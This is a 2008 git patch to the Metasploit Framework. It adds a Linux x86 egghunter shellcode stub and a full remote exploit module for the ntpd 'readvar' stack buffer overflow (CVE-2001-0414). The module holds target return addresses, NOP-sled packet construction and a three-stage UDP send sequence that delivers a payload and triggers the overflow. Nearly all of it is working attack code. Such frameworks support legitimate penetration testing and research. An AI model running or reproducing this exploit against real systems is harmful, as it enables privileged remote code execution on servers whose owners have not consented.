From 0adab629ba41e8a98ab11752d61d953b1498f4b0 Mon Sep 17 00:00:00 2001 From: Patrick Webster Date: Mon, 12 May 2008 14:49:45 +0000 Subject: [PATCH] Added ntp module, linux egghunter git-svn-id: file:///home/svn/framework3/trunk@5502 4d416f70-5f16-0410-b530-b9f4589650da --- lib/rex/exploitation/egghunter.rb | 29 ++++++ modules/exploits/multi/ntp/ntp_overflow.rb | 103 +++++++++++++++++++++ 2 files changed, 132 insertions(+) create mode 100644 modules/exploits/multi/ntp/ntp_overflow.rb diff --git a/lib/rex/exploitation/egghunter.rb b/lib/rex/exploitation/egghunter.rb index a01081b0ce..bfdcd7e29e 100644 --- a/lib/rex/exploitation/egghunter.rb +++ b/lib/rex/exploitation/egghunter.rb @@ -43,6 +43,35 @@ class Egghunter end end + + ### + # + # Linux-based egghunters + # + ### + module Linux + Alias = "linux" + + module X86 + Alias = ARCH_X86 + + # + # The egg hunter stub for linux/x86. + # + def hunter_stub + { + 'Stub' => + "\xfc\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80" + + "\x3c\xf2\x74\xf1\xb8" + + "\x41\x41\x41\x41" + + "\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7", + 'EggSize' => 4, + 'EggOffset' => 0x11 + } + end + + end + end ### # diff --git a/modules/exploits/multi/ntp/ntp_overflow.rb b/modules/exploits/multi/ntp/ntp_overflow.rb new file mode 100644 index 0000000000..e96b09b3bf --- /dev/null +++ b/modules/exploits/multi/ntp/ntp_overflow.rb @@ -0,0 +1,103 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +module Msf + +class Exploits::Multi::Ntp::Ntp_Overflow < Msf::Exploit::Remote + + include Exploit::Remote::Udp + include Exploit::Remote::Egghunter + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'NTP daemon readvar Buffer Overflow', + 'Description' => %q{ + This module exploits a stack based buffer overflow in the + ntpd and xntpd service. By sending an overly long 'readvar' + request it is possible to execute code remotely. As the stack + is corrupted, this module uses the Egghunter technique. + }, + 'Author' => 'patrick', + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'BID', '2540' ], + [ 'OSVDB', '805' ], + [ 'CVE', '2001-0414' ], + [ 'URL', 'http://www.kb.cert.org/vuls/id/970472' ], + ], + 'Payload' => + { + 'Space' => 220, + 'BadChars' => "\x00\x01\x02\x16,=", + 'StackAdjustment' => -3500, + 'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "xor eax,eax mov al,27 int 0x80").encode_string, # alarm(0) + 'Compat' => + { + 'ConnectionType' => '-reverse', + }, + }, + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86 ], + 'Targets' => + [ + [ 'RedHat Linux 7.0 ntpd 4.0.99j', { 'Ret' => 0xbffffbb0 } ], + [ 'RedHat Linux 7.0 ntpd 4.0.99j w/debug', { 'Ret' => 0xbffff980 } ], + [ 'RedHat Linux 7.0 ntpd 4.0.99k', { 'Ret' => 0xbffffbb0 } ], + #[ 'FreeBSD 4.2-STABLE', { 'Ret' => 0xbfbff8bc } ], + [ 'Debugging', { 'Ret' => 0xdeadbeef } ], + ], + 'Privileged' => true, + 'DisclosureDate' => 'Apr 04 2001', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(123)], self.class) + end + + def exploit + + hunter = generate_egghunter + egg = hunter[1] + + connect_udp + + pkt1 = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x016stratum=" + pkt2 = "\x16\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00" + + sploit = pkt1 + make_nops(512 - pkt1.length) + sploit[(220 + pkt1.length), 4] = [target['Ret']].pack('V') + sploit[(224 + pkt1.length), hunter[0].length] = hunter[0] + + print_status("Trying target #{target.name}...") + + print_status("Sending hunter") + udp_sock.put(sploit) + sleep(0.5) + + print_status("Sending payload") + udp_sock.put(pkt1 + egg + egg + payload.encoded) + sleep(0.5) + + print_status("Calling overflow trigger") + udp_sock.put(pkt2) + sleep(0.5) + + handler + disconnect_udp + + end + +end +end +